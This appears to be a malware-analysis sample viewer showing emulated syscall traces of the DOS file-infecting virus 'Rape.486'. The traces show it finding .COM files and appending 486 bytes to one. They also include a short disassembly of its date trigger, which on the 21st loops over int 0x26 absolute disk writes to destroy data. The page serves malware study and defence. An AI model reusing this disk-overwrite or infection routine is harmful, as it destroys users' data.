Sample viewer

vx.netlux.org/Virus.DOS.Rape.486

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:13:55.43114725Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19b 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-17T22:13:55.434298772Z	78	PC: 12ac2 \| Find first file
2018-12-17T22:13:55.440234792Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.457775349Z	61	PC: 12ae0 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:13:55.465562585Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.472852524Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.474338882Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.476653071Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.484373215Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:13:55.499850543Z	79	PC: 12b94 \| Find next file
2018-12-17T22:13:55.503695844Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.514622768Z	61	PC: 12ae0 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:13:55.521501788Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.528925975Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.530887856Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.535226159Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.542588842Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:13:55.553095335Z	79	PC: 12b94 \| Find next file
2018-12-17T22:13:55.556468042Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.567601825Z	61	PC: 12ae0 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:13:55.575634275Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.583005354Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.584366239Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.586706795Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.594694536Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:13:55.60960622Z	79	PC: 12b94 \| Find next file
2018-12-17T22:13:55.613255794Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.625680542Z	61	PC: 12ae0 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:13:55.634095352Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.642803729Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.644312088Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.645933426Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.654036552Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:13:55.66401367Z	79	PC: 12b94 \| Find next file
2018-12-17T22:13:55.666951287Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.678566316Z	61	PC: 12ae0 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:13:55.685071502Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.691508226Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.693794646Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.695274861Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.702569515Z	67	PC: 12b8b \| Get or set file attributes
2018-12-17T22:13:55.715328262Z	79	PC: 12b94 \| Find next file
2018-12-17T22:13:55.718133724Z	67	PC: 12ada \| Get or set file attributes
2018-12-17T22:13:55.727814054Z	61	PC: 12ae0 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:13:55.739733305Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:55.746877645Z	66	PC: 12b1a \| Move file pointer
2018-12-17T22:13:55.74851843Z	64	PC: 12b3b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:55.751349021Z	66	PC: 12b45 \| Move file pointer
2018-12-17T22:13:55.754906976Z	64	PC: 12c53 \| Write file or device (Write 486 bytes on handle 5)
2018-12-17T22:13:55.763182894Z	87	PC: 12b7b \| Get or set file date and time
2018-12-17T22:13:55.764842735Z	62	PC: 12b7f \| Close file
2018-12-17T22:13:55.773074541Z	67	PC: 12b8b \| Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2666,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:46:09.810443081Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19b 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T11:46:09.813491199Z	78	PC: 12ac2 \| Find first file
2018-12-25T11:46:09.819399389Z	67	PC: 12ada \| Get or set file attributes
2018-12-25T11:46:09.835618586Z	61	PC: 12ae0 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:09.852088177Z	63	PC: 12af1 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:09.858503793Z	66	PC: 12b1a \| Move file pointer
2018-12-25T11:46:09.859895939Z	87	PC: 12b7b \| Get or set file date and time
2018-12-25T11:46:09.86170068Z	62	PC: 12b7f \| Close file
2018-12-25T11:46:09.868814717Z	67	PC: 12b8b \| Get or set file attributes
2018-12-25T11:46:09.878517911Z	79	PC: 12b94 \| Find next file
2018-12-25T11:46:09.882057135Z	67	PC: 12ada \| Get or set file attributes (See above)
2018-12-25T11:46:09.891774512Z	61	PC: 12ae0 \| Open file (See above)
2018-12-25T11:46:09.895784636Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:46:09.90196804Z	66	PC: 12b1a \| Move file pointer (See above)
2018-12-25T11:46:09.903476088Z	87	PC: 12b7b \| Get or set file date and time (See above)
2018-12-25T11:46:09.90483637Z	62	PC: 12b7f \| Close file (See above)
2018-12-25T11:46:09.912060475Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:46:09.921978798Z	79	PC: 12b94 \| Find next file (See above)
2018-12-25T11:46:09.924375016Z	67	PC: 12ada \| Get or set file attributes (See above)
2018-12-25T11:46:09.933804592Z	61	PC: 12ae0 \| Open file (See above)
2018-12-25T11:46:09.950843315Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:46:09.957073714Z	66	PC: 12b1a \| Move file pointer (See above)
2018-12-25T11:46:09.958435487Z	87	PC: 12b7b \| Get or set file date and time (See above)
2018-12-25T11:46:09.960440667Z	62	PC: 12b7f \| Close file (See above)
2018-12-25T11:46:09.967985191Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:46:09.978070104Z	79	PC: 12b94 \| Find next file (See above)
2018-12-25T11:46:09.981720636Z	67	PC: 12ada \| Get or set file attributes (See above)
2018-12-25T11:46:09.990935603Z	61	PC: 12ae0 \| Open file (See above)
2018-12-25T11:46:09.999444843Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:46:10.007665239Z	66	PC: 12b1a \| Move file pointer (See above)
2018-12-25T11:46:10.008975391Z	87	PC: 12b7b \| Get or set file date and time (See above)
2018-12-25T11:46:10.010366448Z	62	PC: 12b7f \| Close file (See above)
2018-12-25T11:46:10.018529343Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:46:10.028066219Z	79	PC: 12b94 \| Find next file (See above)
2018-12-25T11:46:10.030567531Z	67	PC: 12ada \| Get or set file attributes (See above)
2018-12-25T11:46:10.04070755Z	61	PC: 12ae0 \| Open file (See above)
2018-12-25T11:46:10.047299051Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:46:10.05348839Z	66	PC: 12b1a \| Move file pointer (See above)
2018-12-25T11:46:10.055552312Z	87	PC: 12b7b \| Get or set file date and time (See above)
2018-12-25T11:46:10.057008004Z	62	PC: 12b7f \| Close file (See above)
2018-12-25T11:46:10.064583051Z	67	PC: 12b8b \| Get or set file attributes (See above)
2018-12-25T11:46:10.077273751Z	79	PC: 12b94 \| Find next file (See above)
2018-12-25T11:46:10.080394943Z	67	PC: 12ada \| Get or set file attributes (See above)
2018-12-25T11:46:10.089846233Z	61	PC: 12ae0 \| Open file (See above)
2018-12-25T11:46:10.096206145Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:46:10.103149625Z	66	PC: 12b1a \| Move file pointer (See above)
2018-12-25T11:46:10.104435893Z	64	PC: 12b3b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:10.106877797Z	66	PC: 12b45 \| Move file pointer
2018-12-25T11:46:10.109273642Z	64	PC: 12c53 \| Write file or device (Write 486 bytes on handle 5)
2018-12-25T11:46:10.117654267Z	87	PC: 12b7b \| Get or set file date and time (See above)
2018-12-25T11:46:10.119023267Z	62	PC: 12b7f \| Close file (See above)
2018-12-25T11:46:10.127185737Z	67	PC: 12b8b \| Get or set file attributes (See above)

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2666,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:46:09.924909331Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19b 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T11:46:09.94803465Z	9	PC: 12a9e \| Display string (String= '486 Virus - (C)1991 RABID, InternationalBy Zodiac - RABID Priest')